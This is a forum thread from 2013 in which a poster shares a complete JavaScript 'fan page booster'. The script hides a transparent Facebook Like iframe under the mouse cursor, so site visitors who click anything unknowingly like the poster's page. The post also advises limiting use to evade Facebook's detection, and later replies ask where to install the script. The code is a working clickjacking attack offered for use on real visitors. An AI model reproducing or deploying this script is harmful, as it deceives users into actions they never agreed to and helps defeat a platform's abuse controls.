1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

facebook fan page booster script! for free!

Discussion in 'Scripts' started by Gerasimus, Apr 6, 2013.

  1. #1
    I want to post something that I love to use:

    It's a javascript file that creates the auto-like function.

    This is a great script that I made some fixes; before, the like function used to be disabled on a second click, but now it doesn't matter how many clicks the users do... the like was taken and persists that way.

    The functionality is simple:

    This script creates a hidden like button that floats within the mouse cursor. When users do clicks (pictures, links and so on) they are liking your fanpage or url!
    Don't use it more than 10 minutes per hour. FB detects it and disables it right away.

    <script type="text/javascript">
    (function(){
     
      var Xcord = 0,
      Ycord = 0,
      IE = document.all ? true : false;
     
      if (!IE) document.captureEvents(Event.MOUSEMOVE);
     
      var lbox = document.createElement('iframe');
      lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'https://www.facebook.com/creative.m1nds') + '&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=lbox&amp;colorscheme=light&amp;height=80';
      lbox.scrolling = 'no';
      lbox.frameBorder = 0;
      lbox.allowTransparency = 'true';
      lbox.style.border = 0;
      lbox.style.overflow = 'hidden';
      lbox.style.cursor = 'pointer';
      lbox.style.width = '53px';
      lbox.style.height =  '23px';
      lbox.style.position = 'absolute';
      lbox.style.opacity = 0;
      document.getElementsByTagName('body')[0].appendChild(lbox);
     
      window.addEventListener('mousemove', mouseMove, false);
     
      setTimeout(function(){
        document.getElementsByTagName('body')[0].removeChild(lbox);
        window.removeEventListener('mousemove', mouseMove, false);
      }, 20000);
     
      function mouseMove(e) {
        if (IE) {
          Xcord = event.clientX + document.body.scrollLeft;
          Ycord = event.clientY + document.body.scrollTop;
        } else {
          Xcord = e.pageX;
          Ycord = e.pageY;
        }
       
        if (Xcord < 0) Xcord = 0;
        if (Ycord < 0) Ycord = 0;
       
        lbox.style.top = (Ycord - 8) + 'px';
        lbox.style.left = (Xcord - 25) + 'px';
       
        return true
      }
    })();
    </script>
    
    Code (markup):
    Dont forget to change https://www.facebook.com/creative.m1nds to your own page.
     
    Gerasimus, Apr 6, 2013 IP
  2. creatiz

    creatiz Greenhorn

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    21
    #2
    actually where to put this script in facebook.., can u give that link facebok.. tq
     
    creatiz, Jun 24, 2013 IP
  3. Gerasimus

    Gerasimus Greenhorn

    Messages:
    61
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    20
    #3
    on facebook? This script is for your website :) not facebook
     
    Gerasimus, Aug 23, 2013 IP
  4. cool.shubhammehta

    cool.shubhammehta Active Member

    Messages:
    124
    Likes Received:
    6
    Best Answers:
    0
    Trophy Points:
    53
    #4
    where to put it in html page ??
     
    cool.shubhammehta, Sep 13, 2013 IP
  5. Gerasimus

    Gerasimus Greenhorn

    Messages:
    61
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    20
    #5
    And what do you think? You can put it under the pillow......
     
    Gerasimus, Sep 13, 2013 IP
  6. Suman Banerjee

    Suman Banerjee Greenhorn

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    21
    #6
    Does this script still work? I added the code under header, nothing happened!
     
    Suman Banerjee, Apr 4, 2014 IP